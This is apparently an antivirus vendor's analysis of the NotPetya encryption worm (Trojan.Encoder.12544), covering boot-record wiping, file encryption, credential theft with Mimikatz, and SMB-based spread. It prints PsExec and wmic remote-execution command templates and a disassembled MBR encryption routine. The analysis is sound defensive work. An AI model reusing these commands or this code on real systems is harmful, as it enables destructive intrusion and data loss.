Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Trojan.Encoder.12544

Added to the Dr.Web virus database: 2017-06-27

Virus description added:

SHA1:

  • 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d

Encryption worm mentioned in mass media as Petya, Petya.A, ExPetya, WannaCry-2, etc. The mass spread of Trojan.Encoder.12544 started before noon of June 27, 2017. It is an unpacked dynamic library.

Overall action sequence:

  1. It configures privileges for itself, checks the running processes, loads its binary file to the memory.
  2. It allocates the memory, creates there its own copy and calls the procedure with RVA 0x94A5. This procedure unloads the original file using FreeLibrary, rewrites the Trojan file on the disk with the trash data and removes it. After that it transfers control to perfc_1 of the image loaded by the Trojan.
  3. It picks command line parameters.
  4. Controls the relaunch.
  5. It damages the boot record of the partition (VBR).
  6. Creates a task to restart the computer.

Once launched, the Trojan checks the system for running processes cSvcHst.exe (Symantec Service Framework), NS.exe (Symantec) and avp.exe (Kaspersky Anti-Virus).

Adopts several command line parameters. First of them is a number. Perhaps, it is used to receive random numbers. It also uses parameter -h (see below).

Relaunch control

Relaunch control is performed only when the Trojan has privileges SeDebugPrivilege. The encoder performs the relaunch control using the file it saves to the folder C:\Windows\. This file changes name according to the Trojan’s name without an extension. Due to the fact that the examined Trojan sample has the name perfc.dat, the file that prevents its relaunch will be named C:\Windows\perfc. In case of the change of the Trojan’s name, availability of the file C:\Windows\perfc will not prevent the infection.

Wiping of a boot record

When the SeDebugPrivilege privilege is available, the Trojan wipes VBR of the disk C: by filling the first (counting from null) sector with trash data. Then it tries to encrypt MBR. If MBR contains GPT or RAW partition, the Trojan doesn’t encrypt it. The encryption is performed with the XOR algorithm by a single byte 0x07. Encrypted MBR is saved to the disk sector 0x22. Sectors up to 0x22 are also rewritten. If the encryption of MBR failed, the Trojan fills first 10 sectors with trash data.

The malicious program can clear system logs using wevtutil and delete "change journal” using fsutil.

File encryption

File encryption is performed only in logical partitions on fixed disks. The contents of each disk are encrypted in their own thread. Algorithm AES-128-CBC is used for encryption. Each disk gets its own key. This key is encrypted with algorithm RSA-2048 and saved to the root folder of the encrypted disk to the file named README.TXT. Encrypted files do not get an additional extension.

Resources

The Trojan contains 4 compressed resources:

  1. MZPE x86 file, SHA1 56c03d8e43f50568741704aee482704a4f5005ad—Tool.Mimikatz.64.
  2. MZPE x64 file, SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf—Tool.Mimikatz.65.
  3. MZPE x86 file, SHA1 cd23b7c9e0edef184930bc8e0ca2264f0608bcb3—Sysinternals PsExec.
  4. Encrypted code fragment, SHA1 5fb0843a2bbb58a92037f836a97f2f05fae71667—Trojan.Inject2.55021.

The Trojan saves Sysinternals PsExec to the folder %WINDIR% or %COMMON_APPDATA% with the name dllhost.dat. DWORD stores each source with the first value in the uncompressed state.

Distribution

Once launched, the Trojan starts searching for computers in the local network using the following methods:

  1. It lists network adapters using GetAdaptersInfo, extracts IP addresses and a subnet mask, and also extracts IP address of DHCP.
  2. If the Trojan is launched on server, it lists DHCP scopes DhcpEnumSubnets.
  3. It extracts all active connections using GetExtendedTcpTable.
  4. Extracts information about ARP IP GetIpNetTable.
  5. It tries to list machines in the domain.

According to the received list of IP addresses, the scanning of ports 445 and 139 starts. Once machines with open ports are found, Trojan.Encoder.12544 attempts to infect them via a widely known SMB protocol vulnerability (CVE-2017-0144).

Depending on an operating system’s capacity, the Trojan unpacks the respective version of the Mimikatz tool, saves it to a temporary folder and then runs it with the name pipe:

'%TEMP%\4214.tmp' \\.\pipe\{7AC40626-8E78-436F-8DFE-8EE9752FE743}

The Trojan receives information about Windows user accounts via this pipe. Besides using the Mimikatz tool, the Trojan receives user account data using the following methods:

  1. Extraction via CredEnumerateW with the filter TERMSRV.
  2. Analysis of the command line with parameter –h, which receives a list of accounts.

Then the Trojan searches for network sources that are open for logging, tries to log into them using the obtained user account data and create its own copy there:

\\\\%ws\\admin$\\%ws

The infection of network servers is performed with the following two methods:

  1. Launch of a remote process with the tool Sysinternals PsExec, which is extracted from its own sources:
    %s \\\\%s -accepteula -s -d C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1
    
  2. Use of the tool wbem\\wmic.exe:
    %s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\ process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\%s\\\" #1
    

Analysis of the boot record infection

Process of the boot record infection is performed in the following order:

  1. Starting from the null sector, it writes its MBR and the Trojan code.
  2. Original MBR, encrypted with the XOR algorithm, is saved to the sector 34.
  3. Buffer filled with 0x07 is saved to the sector 33.
  4. Structure used for encryption is saved to the sector 32.

#pragma pack(push, 2)
struct data_info_t
{
  char isEncode;
  char key1_salsa20[32]; //randomly generated, key salsa20
  char key2_nonce[8]; //nonce salsa20
  char bitcountAddr1[64]; //1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX (old Petya had urls here)
  char bitcountAddr2[64]; //empty
  char keyString[342]; //a key which is sent to the authors is randomly generated and run through the alphabet //123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz
  char field_0;
};
#pragma pack(pop)

Keys key1_salsa20, key2_nonce, keyString are randomly generated. The key key1_salsa20 is used for the encryption of disk sectors. Key keyString is sent to the Trojan’s authors, but, due to the fact that it is not connected with key1_salsa20, cybercriminals will not be able to provide a victim with a decryption key.

After restart of the computer, control is granted to the Trojan boot record. The Trojan reads sector 32 and checks flag data_info_t.isEncode==1 for an encrypted disk. If the disk is not encrypted, the Trojan starts its encryption. To do that, it reads the contents of the sector 33 and encrypts it with s20_crypt. The algorithm is adopted from the project https://github.com/alexwebr/salsa20. Files data_info_t.key1_salsa20 and data_info_t.key2_nonce are used as keys. In addition, data_info_t.key1_salsa20 is filled with nulls, the encrypted sector 33 is saved and the sector 32 is rewritten with the zero value of key1_salsa20.

The sector 33 serves as an identifier of a successful decryption when a user inputs a key. In this case it will be decrypted in a test mode and compared with the array 0x07. Then the Trojan encrypts MFT.

The encryption procedure looks as follows:


seg000:811A                               encodeProcess   proc near               ; CODE XREF: sub_84E8+DDp
seg000:811A
seg000:811A                               ind             = dword ptr -1224h
seg000:811A                               key1            = byte ptr -1220h
seg000:811A                               sevenBuf        = byte ptr -1200h
seg000:811A                               dataInfo        = data_info_t ptr -200h
seg000:811A                               part            = word ptr  4
seg000:811A                               arg_6           = byte ptr  0Ah
seg000:811A
seg000:811A C8 24 12 00                                   enter   1224h, 0
seg000:811E 56                                            push    si
seg000:811F 68 BE 9A                                      push    offset aRepairingFileS ; "\r\n  Repairing file system on C: \r\n\"...
seg000:8122 E8 B9 04                                      call    printMSG
seg000:8125 5B                                            pop     bx
seg000:8126 6A 00                                         push    0               ; isWrite
seg000:8128 6A 01                                         push    1               ; countSect
seg000:812A 6A 00                                         push    0               ; int
seg000:812C 6A 20                                         push    32              ; int
seg000:812E 8D 86 00 FE                                   lea     ax, [bp+dataInfo]
seg000:8132 50                                            push    ax              ; outBuf
seg000:8133 8A 46 0A                                      mov     al, [bp+arg_6]
seg000:8136 50                                            push    ax              ; driverIndex
seg000:8137 E8 20 0B                                      call    readWriteDisk   ; data info
seg000:813A 83 C4 0C                                      add     sp, 0Ch
seg000:813D 0A C0                                         or      al, al
seg000:813F 74 06                                         jz      short loc_8147
seg000:8141 E8 DA 07                                      call    printTXT2
seg000:8144 5E                                            pop     si
seg000:8145 C9                                            leave
seg000:8146 C3                                            retn
seg000:8147                               ; ---------------------------------------------------------------------------
seg000:8147
seg000:8147                               loc_8147:                               ; CODE XREF: encodeProcess+25j
seg000:8147 C6 86 00 FE 01                                mov     [bp+dataInfo.isEncode], 1
seg000:814C 66 2B C0                                      sub     eax, eax
seg000:814F 66 89 86 DC ED                                mov     [bp+ind], eax
seg000:8154 EB 05                                         jmp     short loc_815B
seg000:8156                               ; ---------------------------------------------------------------------------
seg000:8156
seg000:8156                               loop5:                                  ; CODE XREF: encodeProcess+5Aj
seg000:8156 66 FF 86 DC ED                                inc     [bp+ind]
seg000:815B
seg000:815B                               loc_815B:                               ; CODE XREF: encodeProcess+3Aj
seg000:815B 66 83 BE DC ED 20                             cmp     [bp+ind], 32
seg000:8161 73 13                                         jnb     short loc_8176
seg000:8163 8B B6 DC ED                                   mov     si, word ptr [bp+ind]
seg000:8167 8A 82 01 FE                                   mov     al, [bp+si+dataInfo.key1_salsa20]
seg000:816B 88 82 E0 ED                                   mov     [bp+si+key1], al
seg000:816F C6 82 01 FE 00                                mov     [bp+si+dataInfo.key1_salsa20], 0
seg000:8174 EB E0                                         jmp     short loop5
seg000:8176                               ; ---------------------------------------------------------------------------
seg000:8176
seg000:8176                               loc_8176:                               ; CODE XREF: encodeProcess+47j
seg000:8176 66 2B C0                                      sub     eax, eax
seg000:8179 66 89 86 DC ED                                mov     [bp+ind], eax
seg000:817E EB 05                                         jmp     short loc_8185
seg000:8180                               ; ---------------------------------------------------------------------------
seg000:8180
seg000:8180                               loc_8180:                               ; CODE XREF: encodeProcess+8Aj
seg000:8180 66 FF 86 DC ED                                inc     [bp+ind]
seg000:8185
seg000:8185                               loc_8185:                               ; CODE XREF: encodeProcess+64j
seg000:8185 66 83 BE DC ED 20                             cmp     [bp+ind], 32
seg000:818B 73 19                                         jnb     short loc_81A6
seg000:818D 6A 01                                         push    1               ; isWrite
seg000:818F 6A 01                                         push    1               ; countSect
seg000:8191 6A 00                                         push    0               ; int
seg000:8193 6A 20                                         push    32              ; int
seg000:8195 8D 86 00 FE                                   lea     ax, [bp+dataInfo]
seg000:8199 50                                            push    ax              ; outBuf
seg000:819A 8A 46 0A                                      mov     al, [bp+arg_6]
seg000:819D 50                                            push    ax              ; driverIndex
seg000:819E E8 B9 0A                                      call    readWriteDisk   ; data info
seg000:81A1 83 C4 0C                                      add     sp, 0Ch
seg000:81A4 EB DA                                         jmp     short loc_8180
seg000:81A6                               ; ---------------------------------------------------------------------------
seg000:81A6
seg000:81A6                               loc_81A6:                               ; CODE XREF: encodeProcess+71j
seg000:81A6 6A 00                                         push    0               ; isWrite
seg000:81A8 6A 01                                         push    1               ; countSect
seg000:81AA 6A 00                                         push    0               ; int
seg000:81AC 6A 21                                         push    33              ; int
seg000:81AE 8D 86 00 EE                                   lea     ax, [bp+sevenBuf]
seg000:81B2 50                                            push    ax              ; outBuf
seg000:81B3 8A 4E 0A                                      mov     cl, [bp+arg_6]
seg000:81B6 51                                            push    cx              ; driverIndex
seg000:81B7 E8 A0 0A                                      call    readWriteDisk   ; test encode data
seg000:81BA 83 C4 0C                                      add     sp, 0Ch
seg000:81BD 6A 00                                         push    0
seg000:81BF 68 00 02                                      push    200h            ; __int32
seg000:81C2 8D 86 00 EE                                   lea     ax, [bp+sevenBuf]
seg000:81C6 50                                            push    ax              ; sizeSevenBuf
seg000:81C7 6A 00                                         push    0
seg000:81C9 6A 00                                         push    0               ; sevenBuf
seg000:81CB 8D 8E 21 FE                                   lea     cx, [bp+dataInfo.key2_nonce]
seg000:81CF 51                                            push    cx              ; keyHW8
seg000:81D0 8D 96 E0 ED                                   lea     dx, [bp+key1]
seg000:81D4 52                                            push    dx              ; bufEncodeKey32
seg000:81D5 E8 C0 15                                      call    s20_crypt       ; https://github.com/alexwebr/salsa20
seg000:81D8 83 C4 0E                                      add     sp, 0Eh
seg000:81DB 6A 01                                         push    1               ; isWrite
seg000:81DD 6A 01                                         push    1               ; countSect
seg000:81DF 6A 00                                         push    0               ; int
seg000:81E1 6A 21                                         push    33              ; int
seg000:81E3 8D 86 00 EE                                   lea     ax, [bp+sevenBuf]
seg000:81E7 50                                            push    ax              ; outBuf
seg000:81E8 8A 46 0A                                      mov     al, [bp+arg_6]
seg000:81EB 50                                            push    ax              ; driverIndex
seg000:81EC E8 6B 0A                                      call    readWriteDisk   ; save test buf
seg000:81EF 83 C4 0C                                      add     sp, 0Ch
seg000:81F2 6A 01                                         push    1               ; char
seg000:81F4 68 52 9C                                      push    offset aChkdskIsRepair ; "  CHKDSK is repairing sector"
seg000:81F7 8D 86 21 FE                                   lea     ax, [bp+dataInfo.key2_nonce]
seg000:81FB 50                                            push    ax
seg000:81FC 8D 86 E0 ED                                   lea     ax, [bp+key1]
seg000:8200 50                                            push    ax              ; key
seg000:8201 FF 76 04                                      push    [bp+part]       ; part
seg000:8204 E8 91 0A                                      call    decodeDisk
seg000:8207 83 C4 0A                                      add     sp, 0Ah
seg000:820A E8 3B 07                                      call    initMSG2
seg000:820D CD 19                                         int     19h             ; DISK BOOT
seg000:820D                                                                       ; causes reboot of disk system
seg000:820F 5E                                            pop     si
seg000:8210 C9                                            leave
seg000:8211 C3                                            retn
seg000:8211                               encodeProcess   endp

In whole, this code is identical to the one used by the malicious program Petya (excluding a text with demands), the data_info_t structure is the same and is also saved to the sector 32. However, key1_salsa20 and keyString are generated on the basis of elliptic curves.

News about the Trojan

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android